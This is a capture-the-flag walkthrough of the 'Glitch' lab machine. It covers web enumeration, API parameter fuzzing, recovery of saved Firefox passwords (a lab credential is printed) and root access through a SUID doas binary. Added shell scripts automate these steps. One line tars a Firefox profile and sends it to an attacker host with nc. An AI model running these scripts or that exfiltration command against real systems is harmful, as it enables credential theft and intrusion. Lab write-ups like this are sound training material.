GLITCH
Challenge showcasing a web app and simple privilege escalation. Can you find the glitch?
First, scan the machine for open ports. I use RustScan for this: it is much faster than Nmap at the initial sweep, so I prefer it for now and let it hand the open ports to Nmap for service detection.
It looks like only the HTTP port is open. Let's open it in the browser and see what is there. Nothing interesting, so I run feroxbuster to fuzz files and directories. I also start a nikto scan in the background, because it will take a while.
I discovered an interesting path: /api/acces. When I request it, the response contains a token with a base64-encoded value. It is worth decoding that value first to see what it actually is before relying on it. Replace the token cookie's value with the discovered one, then fuzz once more with the cookie configured accordingly.
After another round of fuzzing for files and directories, I examine the JavaScript code located at /js/script.js. From it I get another interesting path, /api/items. After a while I get something in the response by changing the request method.
At this stage I hit a temporary impasse. After a while I proceeded to fuzz for parameter names, filtering for responses with a 500 status code: a server error on one particular parameter name usually means the backend actually tried to use the value we sent, which is exactly what we want to find.
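The enumeration steps above, collected into one POSIX shell script. This is an added example and not part of the original writeup: the target address, the wordlist path and the cookie name "token" are assumptions, and TOKEN must be replaced with the value recovered from the API. The method probe and the parameter fuzzer only use curl, so they can be dropped into any lab.

```shell
#!/bin/sh
# Added example: enumeration helpers for the steps in the writeup above.
# Placeholders (assumptions, not from the writeup): TARGET, WORDLIST and
# the cookie name "token"; TOKEN is the base64 value found via the API.
TARGET="${TARGET:-http://10.10.10.10}"
TOKEN="${TOKEN:-PASTE_DISCOVERED_TOKEN_HERE}"
WORDLIST="${WORDLIST:-/usr/share/wordlists/dirb/common.txt}"

# Port sweep with RustScan (open ports are handed to Nmap for -sC -sV),
# a background nikto run, then directory fuzzing with the cookie set.
recon() {
    ip="$1"
    rustscan -a "$ip" -- -sC -sV
    nikto -h "$TARGET" > nikto.txt 2>&1 &
    feroxbuster -u "$TARGET" -w "$WORDLIST" -H "Cookie: token=$TOKEN"
}

# Try each HTTP method against a path; print "METHOD STATUS BYTES" per line.
probe_methods() {
    path="$1"
    for m in GET POST PUT PATCH DELETE OPTIONS; do
        out=$(curl -s -m 10 -o /dev/null -w '%{http_code} %{size_download}' \
              -X "$m" -H "Cookie: token=$TOKEN" "$TARGET$path")
        echo "$m $out"
    done
}

# Fuzz query-parameter names from a wordlist with one method and print the
# names that return the wanted status (default 500): a server error on a
# single parameter name usually means the backend tried to use our value.
fuzz_params() {
    path="$1"; method="$2"; wordlist="$3"; want="${4:-500}"
    while IFS= read -r p || [ -n "$p" ]; do
        [ -n "$p" ] || continue
        out=$(curl -s -m 10 -o /dev/null -w '%{http_code} %{size_download}' \
              -X "$method" -H "Cookie: token=$TOKEN" "$TARGET$path?$p=test")
        code=${out%% *}
        if [ "$code" = "$want" ]; then
            echo "$p $code"
        fi
    done < "$wordlist"
}

# Only run the full chain when invoked as "script.sh run", so the file can
# also be sourced for its functions.
if [ "${1:-}" = "run" ]; then
    recon "${TARGET#http://}"
    probe_methods /api/items
    fuzz_params /api/items POST "$WORDLIST" 500
fi
```

Run probe_methods before fuzz_params: the method that answers differently from the rest is the one to fuzz parameters against, and raising the wanted status (or printing every non-404 code) is a one-argument change when the backend does not crash but answers 200 with a different body length.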
Now all I need to do is get a reverse shell.
We get a shell as user, and in the home directory we find the user.txt flag. In the same directory I find a .firefox directory, and again I was stuck for a while.
I transfer the directory to my machine and analyze it. This took me a long time, but finally I got the answer by opening Firefox with that profile and looking at the saved passwords.
v0id:love_the_void
For privilege escalation I follow the usual checklist. After some time I discovered that the doas binary has the SUID bit set. Switch to user v0id with the recovered password and run doas. Keep in mind that doas only grants what /etc/doas.conf permits, so read that file once you are v0id to see which user and commands are allowed.
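The post-exploitation steps above as a shell script: locating SUID binaries, packaging the Firefox profile for transfer, checking that the profile holds the files a saved-password recovery needs, and escalating through doas. This is an added example, not from the original writeup; the listener address and port, the profile path and the root shell command are placeholders and assumptions.

```shell
#!/bin/sh
# Added example for the post-exploitation steps: SUID hunt, Firefox profile
# transfer and doas. ATTACKER, PORT and the paths are placeholders.
ATTACKER="${ATTACKER:-10.0.0.1}"
PORT="${PORT:-4444}"

# List setuid files under a directory (use / on the target); doas should
# show up here if it carries the SUID bit.
find_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null
}

# Firefox keeps saved logins in logins.json, encrypted with a key stored in
# key4.db (older profiles: key3.db). Return 0 if a profile has both parts.
profile_ready() {
    dir="$1"
    [ -f "$dir/logins.json" ] || return 1
    if [ -f "$dir/key4.db" ] || [ -f "$dir/key3.db" ]; then
        return 0
    fi
    return 1
}

# On the target: stream the whole .firefox directory to our listener.
# On the attacker first run:  nc -lvnp "$PORT" > firefox.tgz
send_profile() {
    dir="$1"
    tar czf - -C "$(dirname "$dir")" "$(basename "$dir")" | nc "$ATTACKER" "$PORT"
}

# On the attacker: unpack and open the profile directory in Firefox, then
# read the saved logins from about:logins (a tool such as firefox_decrypt
# does the same from the command line).
open_profile() {
    tar xzf firefox.tgz
    firefox --no-remote --profile "$1"
}

# As v0id: doas only allows what /etc/doas.conf permits, so read it first,
# then ask for a root shell (the command to run is an assumption here).
escalate() {
    cat /etc/doas.conf
    doas -u root /bin/sh
}

# Only run when invoked as "script.sh run", so the functions can be sourced.
if [ "${1:-}" = "run" ]; then
    find_suid /
    profile_ready "$HOME/.firefox" && send_profile "$HOME/.firefox"
fi
```

Run find_suid first on the target to confirm doas is SUID, send_profile from the user shell, open_profile on your own machine, and escalate only after su v0id with the recovered password.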